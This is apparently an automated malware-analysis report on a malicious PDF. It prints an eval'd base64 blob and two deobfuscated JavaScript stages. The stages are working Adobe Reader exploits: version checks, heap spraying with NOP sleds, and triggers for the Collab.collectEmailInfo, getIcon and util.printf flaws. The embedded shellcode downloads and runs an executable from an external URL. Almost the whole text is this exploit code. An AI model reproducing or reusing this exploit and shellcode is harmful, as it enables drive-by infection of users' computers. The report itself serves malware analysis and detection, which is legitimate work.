U0ZSU0ZCU2ZCU2ZSU2NyU0ZSUyOSUzYiUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU2OCU3MiU1MiUzMyU2NSUzMCU0OCUzOCU3MCUyMCUzZCUyMCUyOCU0NiU0ZCU0YSU1MCU3NyU2MSU1MCU1OSU1NyUyMCUyZCUyMCUzMCU3OCUzNCUzMCUzMCUzMCUzMCUzMCUyOSUyMCUyZiUyMCU0MiU3NyU2MyU0MSU3MSU1OCUzMiU0NCU3OSUzYiUyMCUyMCUyMCUyMCU2NiU2ZiU3MiUyOCU3NiU2MSU3MiUyMCU1YSU1MiU2YSU1OCU0MiU3MCU2MiUzNCU3OSUyMCUzZCUyMCUzMCUzYiUyMCU1YSU1MiU2YSU1OCU0MiU3MCU2MiUzNCU3OSUyMCUzYyUyMCU2OCU3MiU1MiUzMyU2NSUzMCU0OCUzOCU3MCUzYiUyMCU1YSU1MiU2YSU1OCU0MiU3MCU2MiUzNCU3OSUyYiUyYiUyOSUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCU0ZSU1MCU0MSUzNyU0YyU1MSU1NCU3OCU2OSU1YiU1YSU1MiU2YSU1OCU0MiU3MCU2MiUzNCU3OSU1ZCUyMCUzZCUyMCU1MSUzOCU1NyU0ZiU2YiU0OCU3MCU0ZiU3NCUyMCUyYiUyMCU3NCUzNyU1NiU2NiU0ZiU2ZiU2MiU1NiU2MiUzYiUyMCUyMCUyMCUyMCU3ZCUyMCUyMCU3ZCUyMCIpKTsgIGxhdmUodW5lc2NhcGUoIiUyMCUyMCU2NiU3NSU2ZSU2MyU3NCU2OSU2ZiU2ZSUyMCU2NCU1OSUzNyU2ZiU2YSU1NyU2OCU3YSU2NSUyOCUyOSUyMCUyMCU3YiUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU1MCU3MCU0OCU2MiU3OCUzOCU1NiU3NyU2NiUyMCUzZCUyMCUzMCUzYiUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU0NyU3NyU3NCU0NCU1MCU3NSU2NSUzMyU2NSUyMCUzZCUyMCU2MSU3MCU3MCUyZSU3NiU2OSU2NSU3NyU2NSU3MiU1NiU2NSU3MiU3MyU2OSU2ZiU2ZSUyZSU3NCU2ZiU1MyU3NCU3MiU2OSU2ZSU2NyUyOCUyOSUzYiUyMCUyMCUyMCUyMCU2MSU3MCU3MCUyZSU2MyU2YyU2NSU2MSU3MiU1NCU2OSU2ZCU2NSU0ZiU3NSU3NCUyOCU3OSU2ZCU2NiU1YSU2ZCU2NSU1OSU2MSU2MiUyOSUzYiUyMCUyMCUyMCUyMCU2OSU2NiUyOCUyOCU0NyU3NyU3NCU0NCU1MCU3NSU2NSUzMyU2NSUyMCUzZSUzZCUyMCUzOCUyMCUyNiUyNiUyMCU0NyU3NyU3NCU0NCU1MCU3NSU2NSUzMyU2NSUyMCUzYyUyMCUzOCUyZSUzMSUzMCUzMiUyOSUyMCU3YyU3YyUyMCU0NyU3NyU3NCU0NCU1MCU3NSU2NSUzMyU2NSUyMCUzYyUyMCUzNyUyZSUzMSUyOSUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCU1MyU2NCUzOCUzNCU3MiU0ZSUzNiU3NCU2MSUyOCUzMCUyOSUzYiUyMCUyMCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU1MSU1NSUzOCU0ZCUzNSU2MyU2NSU1MCU0MyUyMCUzZCUyMCU3NSU2ZSU2NSU3MyU2MyU2MSU3MCU2NSUyOCUyMiUyNSU3NSUzMCU2MyUzMCU2MyUyNSU3NSUzMCU2MyUzMCU2MyUyMiUyOSUzYiUyMCUyMCUyMCUyMCUyMCUyMCU3NyU2OCU2OSU2YyU2NSUyOCU1MSU1NSUzOCU0ZCUzNSU2MyU2NSU1MCU0MyUyZSU2YyU2NSU2ZSU2NyU3NCU2OCUyMCUzYyUyMCUzNCUzNCUzOSUzNSUzMiUyOSUyMCU1MSU1NSUzOCU0ZCUzNSU2MyU2NSU1MCU0MyUyMCUyYiUzZCUyMCU1MSU1NSUzOCU0ZCUzNSU2MyU2NSU1MCU0MyUzYiUyMCUyMCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU0YiU0ZSU1OCUzMCUzNyU0MiU0NyUzMCU1YSUyMCUzZCUyMCU3NCU2OCU2OSU3MyUzYiUyMCUyMCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU1NyU3NiU2NCU2NyU1NyUzNyU3NyUzNyU2ZCUyMCUzZCUyMCU0MyU2ZiU2YyU2YyU2MSU2MiUzYiUyMCUyMCUyMCUyMCUyMCUyMCU0YiU0ZSU1OCUzMCUzNyU0MiU0NyUzMCU1YSU1YiUyMiU2MyU2ZiU2YyU2YyU2MSU2MiU1MyU3NCU2ZiU3MiU2NSUyMiU1ZCUyMCUzZCUyMCU1NyU3NiU2NCU2NyU1NyUzNyU3NyUzNyU2ZCU1YiUyMiU2MyU2ZiU2YyU2YyU2NSU2MyU3NCU0NSU2ZCU2MSU2OSU2YyU0OSU2ZSU2NiU2ZiUyMiU1ZCUyOCUyMCUyMCUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3MyU3NSU2MiU2YSUyMCUzYSUyMCUyMiUyMiUyYyUyMCU2ZCU3MyU2NyUyMCUzYSUyMCU1MSU1NSUzOCU0ZCUzNSU2MyU2NSU1MCU0MyUyMCUyMCUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCUyMCUyMCUyOSUzYiUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCU2OSU2NiUyOCUyOCU0NyU3NyU3NCU0NCU1MCU3NSU2NSUzMyU2NSUyMCUzZSUzZCUyMCUzOCUyZSUzMSUzMCUzMiUyMCUyNiUyNiUyMCU0NyU3NyU3NCU0NCU1MCU3NSU2NSUzMyU2NSUyMCUzYyUyMCUzOCUyZSUzMSUzMCUzNCUyOSUyMCU3YyU3YyUyMCUyOCU0NyU3NyU3NCU0NCU1MCU3NSU2NSUzMyU2NSUyMCUzZSUzZCUyMCUzOSUyMCUyNiUyNiUyMCU0NyU3NyU3NCU0NCU1MCU3NSU2NSUzMyU2NSUyMCUzYyUyMCUzOSUyZSUzMSUyOSUyMCU3YyU3YyUyMCU0NyU3NyU3NCU0NCU1MCU3NSU2NSUzMyU2NSUyMCUzYyUzZCUyMCUzNyUyZSUzMSUzMCUzMSUyOSUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCU3NCU3MiU3OSUyMCUyMCUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU2OSU2NiUyOCU2MSU3MCU3MCUyZSU2NCU2ZiU2MyUyZSU0MyU2ZiU2YyU2YyU2MSU2MiUyZSU2NyU2NSU3NCU0OSU2MyU2ZiU2ZSUyOSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU1MyU2NCUzOCUzNCU3MiU0ZSUzNiU3NCU2MSUyOCUzMiUyOSUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU2NCU0YiU0NyU2ZSUzMyU3MiU1OCU2MiU3NiUyMCUzZCUyMCU3NSU2ZSU2NSU3MyU2MyU2MSU3MCU2NSUyOCUyMiUyNSUzMCUzOSUyMiUyOSUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3NyU2OCU2OSU2YyU2NSUyOCU2NCU0YiU0NyU2ZSUzMyU3MiU1OCU2MiU3NiUyZSU2YyU2NSU2ZSU2NyU3NCU2OCUyMCUzYyUyMCUzMCU3OCUzNCUzMCUzMCUzMCUyOSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU2NCU0YiU0NyU2ZSUzMyU3MiU1OCU2MiU3NiUyMCUyYiUzZCUyMCU2NCU0YiU0NyU2ZSUzMyU3MiU1OCU2MiU3NiUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU2NCU0YiU0NyU2ZSUzMyU3MiU1OCU2MiU3NiUyMCUzZCUyMCUyMiU0ZSUyZSUyMiUyMCUyYiUyMCU2NCU0YiU0NyU2ZSUzMyU3MiU1OCU2MiU3NiUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU0NiU3NiU1NCU0MSU0YSU0YyU2NiU2NSU2OSUyMCUzZCUyMCU2MSU3MCU3MCUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU0NiU3NiU1NCU0MSU0YSU0YyU2NiU2NSU2OSU1YiUyMiU2NCU2ZiU2MyUyMiU1ZCU1YiUyMiU0MyU2ZiU2YyU2YyU2MSU2MiUyMiU1ZCU1YiUyMiU2NyU2NSU3NCU0OSU2MyU2ZiU2ZSUyMiU1ZCUyOCU2NCU0YiU0NyU2ZSUzMyU3MiU1OCU2MiU3NiUyOSUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU1MCU3MCU0OCU2MiU3OCUzOCU1NiU3NyU2NiUyMCUzZCUyMCUzMSUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU2NSU2YyU3MyU2NSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU1MCU3MCU0OCU2MiU3OCUzOCU1NiU3NyU2NiUyMCUzZCUyMCUzMSUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCUyMCUyMCU2MyU2MSU3NCU2MyU2OCUyOCU2NSUyOSUyMCUyMCUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU1MCU3MCU0OCU2MiU3OCUzOCU1NiU3NyU2NiUyMCUzZCUyMCUzMSUzYiUyMCUyMCUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCUyMCUyMCU2OSU2NiUyOCU1MCU3MCU0OCU2MiU3OCUzOCU1NiU3NyU2NiUyMCUzZCUzZCUyMCUzMSUyOSUyMCUyMCUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU2OSU2NiUyOCU0NyU3NyU3NCU0NCU1MCU3NSU2NSUzMyU2NSUyMCUzZCUzZCUyMCUzOCUyZSUzMSUzMCUzMiUyMCU3YyU3YyUyMCU0NyU3NyU3NCU0NCU1MCU3NSU2NSUzMyU2NSUyMCUzZCUzZCUyMCUzNyUyZSUzMSUyOSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU1MyU2NCUzOCUzNCU3MiU0ZSUzNiU3NCU2MSUyOCUzMSUyOSUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU0NyU3OCU2ZSU0YiU1NiU1MiU2MyU2MyU1NSUyMCUzZCUyMCUyMiUzMSUzMiUzOSUzOSUzOSUzOSUzOSUzOSUzOSUzOSUzOSUzOSUzOSUzOSUzOSUzOSUzOSUzOSUzOSUzOSUyMiUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU2NiU2ZiU3MiUyOCU1OSU0OSU3OCUzNSU2YyU2MyU1YSU2YSU2ZCUyMCUzZCUyMCUzMCUzYiUyMCU1OSU0OSU3OCUzNSU2YyU2MyU1YSU2YSU2ZCUyMCUzYyUyMCUzMiUzNyUzNiUzYiUyMCU1OSU0OSU3OCUzNSU2YyU2MyU1YSU2YSU2ZCUyYiUyYiUyOSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU0NyU3OCU2ZSU0YiU1NiU1MiU2MyU2MyU1NSUyMCUyYiUzZCUyMCUyMiUzOCUyMiUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU1NSU3MyUzNiU3MSU2NCU3MCU0MiU3MSU0OCUyMCUzZCUyMCU3NSU3NCU2OSU2YyUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU1NSU3MyUzNiU3MSU2NCU3MCU0MiU3MSU0OCU1YiUyMiU3MCU3MiU2OSU2ZSU3NCU2NiUyMiU1ZCUyOCUyMiUyNSUzNCUzNSUzMCUzMCUzMCU2NiUyMiUyYyUyMCU0NyU3OCU2ZSU0YiU1NiU1MiU2MyU2MyU1NSUyOSUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCU3ZCUyMCU3ZCUyMCIpKTsgCiBhcHAuVmYza0VJSktEID0gZFk3b2pXaHplOwogeW1mWm1lWWFiID0gYXBwLnNldFRpbWVPdXQoImFwcC5WZjNrRUlKS0QoKSIsIDEpOwo="); var sssddd = eval; sssddd(aasd);
`generic_stage_recovery_000.js`	deobfuscated-js	generic stage recovery percent-decode from JavaScript object 9 at offset 0xD6	5026 bytes
SHA-256: `643264e7ea938f0c2902bb1c0b8e75f2ac7305f47c70f93d9d429738ce3a4607`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 10 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script var NPA7LQTxi = new Array(); var ymfZmeYab; var lave = eval; lave(unescape(" function r0Zel5loW(Q8WOkHpOt, NLqNMmngN) { while(Q8WOkHpOt.length * 2 < NLqNMmngN) { Q8WOkHpOt += Q8WOkHpOt; } Q8WOkHpOt = Q8WOkHpOt.substring(0, NLqNMmngN / 2); return Q8WOkHpOt; } ")); lave(unescape(" function Sd84rN6ta(CejKV3fOJ) { if(CejKV3fOJ == 0) { var FMJPwaPYW = 0x0c0c0c0c; var t7VfOobVb = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u742F%u6874%u6C68%u6B6C%u2E6B%u6E69%u6F66%u2F2F%u6567%u6574%u6578%u702E%u7068%u733F%u6C70%u703D%u6664%u655F%u7078"); } else if(CejKV3fOJ == 1) { FMJPwaPYW = 0x30303030; var t7VfOobVb = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u742F%u6874%u6C68%u6B6C%u2E6B%u6E69%u6F66%u2F2F%u6567%u6574%u6578%u702E%u7068%u733F%u6C70%u703D%u6664%u655F%u7078"); } else if(CejKV3fOJ == 2) { var t7VfOobVb = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u742F%u6874%u6C68%u6B6C%u2E6B%u6E69%u6F66%u2F2F%u6567%u6574%u6578%u702E%u7068%u733F%u6C70%u703D%u6664%u655F%u7078"); } var BwcAqX2Dy = 0x400000; var kZV7r8icm = t7VfOobVb.length * 2; var NLqNMmngN = BwcAqX2Dy - (kZV7r8icm + 0x38); var Q8WOkHpOt = unescape("%u9090%u9090"); Q8WOkHpOt = r0Zel5loW(Q8WOkHpOt, NLqNMmngN); var hrR3e0H8p = (FMJPwaPYW - 0x400000) / BwcAqX2Dy; for(var ZRjXBpb4y = 0; ZRjXBpb4y < hrR3e0H8p; ZRjXBpb4y++) { NPA7LQTxi[ZRjXBpb4y] = Q8WOkHpOt + t7VfOobVb; } } ")); lave(unescape(" function dY7ojWhze() { var PpHbx8Vwf = 0; var GwtDPue3e = app.viewerVersion.toString(); app.clearTimeOut(ymfZmeYab); if((GwtDPue3e >= 8 && GwtDPue3e < 8.102) \|\| GwtDPue3e < 7.1) { Sd84rN6ta(0); var QU8M5cePC = unescape("%u0c0c%u0c0c"); while(QU8M5cePC.length < 44952) QU8M5cePC += QU8M5cePC; var KNX07BG0Z = this; var WvdgW7w7m = Collab; KNX07BG0Z["collabStore"] = WvdgW7w7m["collectEmailInfo"]( { subj : "", msg : QU8M5cePC } ); } if((GwtDPue3e >= 8.102 && GwtDPue3e < 8.104) \|\| (GwtDPue3e >= 9 && GwtDPue3e < 9.1) \|\| GwtDPue3e <= 7.101) { try { if(app.doc.Collab.getIcon) { Sd84rN6ta(2); var dKGn3rXbv = unescape("%09"); while(dKGn3rXbv.length < 0x4000) { dKGn3rXbv += dKGn3rXbv; } dKGn3rXbv = "N." + dKGn3rXbv; var FvTAJLfei = app; FvTAJLfei["doc"]["Collab"]["getIcon"](dKGn3rXbv); PpHbx8Vwf = 1; } else { PpHbx8Vwf = 1; } } catch(e) { PpHbx8Vwf = 1; } if(PpHbx8Vwf == 1) { if(GwtDPue3e == 8.102 \|\| GwtDPue3e == 7.1) { Sd84rN6ta(1); var GxnKVRccU = "12999999999999999999"; for(YIx5lcZjm = 0; YIx5lcZjm < 276; YIx5lcZjm++) { GxnKVRccU += "8"; } var Us6qdpBqH = util; Us6qdpBqH["printf"]("%45000f", GxnKVRccU); } } } } ")); app.Vf3kEIJKD = dY7ojWhze; ymfZmeYab = app.setTimeOut("app.Vf3kEIJKD()", 1);
`generic_stage_recovery_001.js`	deobfuscated-js	generic stage recovery percent-decode -> percent-decode from JavaScript object 9 at offset 0xD6	5022 bytes
SHA-256: `9137217072e29b891babe9c0f338cd66c5c17f0bf6f54f9d5eff0c09a92d6cff`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 10 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script var NPA7LQTxi = new Array(); var ymfZmeYab; var lave = eval; lave(unescape(" function r0Zel5loW(Q8WOkHpOt, NLqNMmngN) { while(Q8WOkHpOt.length * 2 < NLqNMmngN) { Q8WOkHpOt += Q8WOkHpOt; } Q8WOkHpOt = Q8WOkHpOt.substring(0, NLqNMmngN / 2); return Q8WOkHpOt; } ")); lave(unescape(" function Sd84rN6ta(CejKV3fOJ) { if(CejKV3fOJ == 0) { var FMJPwaPYW = 0x0c0c0c0c; var t7VfOobVb = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u742F%u6874%u6C68%u6B6C%u2E6B%u6E69%u6F66%u2F2F%u6567%u6574%u6578%u702E%u7068%u733F%u6C70%u703D%u6664%u655F%u7078"); } else if(CejKV3fOJ == 1) { FMJPwaPYW = 0x30303030; var t7VfOobVb = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u742F%u6874%u6C68%u6B6C%u2E6B%u6E69%u6F66%u2F2F%u6567%u6574%u6578%u702E%u7068%u733F%u6C70%u703D%u6664%u655F%u7078"); } else if(CejKV3fOJ == 2) { var t7VfOobVb = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u742F%u6874%u6C68%u6B6C%u2E6B%u6E69%u6F66%u2F2F%u6567%u6574%u6578%u702E%u7068%u733F%u6C70%u703D%u6664%u655F%u7078"); } var BwcAqX2Dy = 0x400000; var kZV7r8icm = t7VfOobVb.length * 2; var NLqNMmngN = BwcAqX2Dy - (kZV7r8icm + 0x38); var Q8WOkHpOt = unescape("%u9090%u9090"); Q8WOkHpOt = r0Zel5loW(Q8WOkHpOt, NLqNMmngN); var hrR3e0H8p = (FMJPwaPYW - 0x400000) / BwcAqX2Dy; for(var ZRjXBpb4y = 0; ZRjXBpb4y < hrR3e0H8p; ZRjXBpb4y++) { NPA7LQTxi[ZRjXBpb4y] = Q8WOkHpOt + t7VfOobVb; } } ")); lave(unescape(" function dY7ojWhze() { var PpHbx8Vwf = 0; var GwtDPue3e = app.viewerVersion.toString(); app.clearTimeOut(ymfZmeYab); if((GwtDPue3e >= 8 && GwtDPue3e < 8.102) \|\| GwtDPue3e < 7.1) { Sd84rN6ta(0); var QU8M5cePC = unescape("%u0c0c%u0c0c"); while(QU8M5cePC.length < 44952) QU8M5cePC += QU8M5cePC; var KNX07BG0Z = this; var WvdgW7w7m = Collab; KNX07BG0Z["collabStore"] = WvdgW7w7m["collectEmailInfo"]( { subj : "", msg : QU8M5cePC } ); } if((GwtDPue3e >= 8.102 && GwtDPue3e < 8.104) \|\| (GwtDPue3e >= 9 && GwtDPue3e < 9.1) \|\| GwtDPue3e <= 7.101) { try { if(app.doc.Collab.getIcon) { Sd84rN6ta(2); var dKGn3rXbv = unescape(" "); while(dKGn3rXbv.length < 0x4000) { dKGn3rXbv += dKGn3rXbv; } dKGn3rXbv = "N." + dKGn3rXbv; var FvTAJLfei = app; FvTAJLfei["doc"]["Collab"]["getIcon"](dKGn3rXbv); PpHbx8Vwf = 1; } else { PpHbx8Vwf = 1; } } catch(e) { PpHbx8Vwf = 1; } if(PpHbx8Vwf == 1) { if(GwtDPue3e == 8.102 \|\| GwtDPue3e == 7.1) { Sd84rN6ta(1); var GxnKVRccU = "12999999999999999999"; for(YIx5lcZjm = 0; YIx5lcZjm < 276; YIx5lcZjm++) { GxnKVRccU += "8"; } var Us6qdpBqH = util; Us6qdpBqH["printf"]("E000f", GxnKVRccU); } } } } ")); app.Vf3kEIJKD = dY7ojWhze; ymfZmeYab = app.setTimeOut("app.Vf3kEIJKD()", 1);

Open this report in the interactive analyzer, or submit your own file for analysis.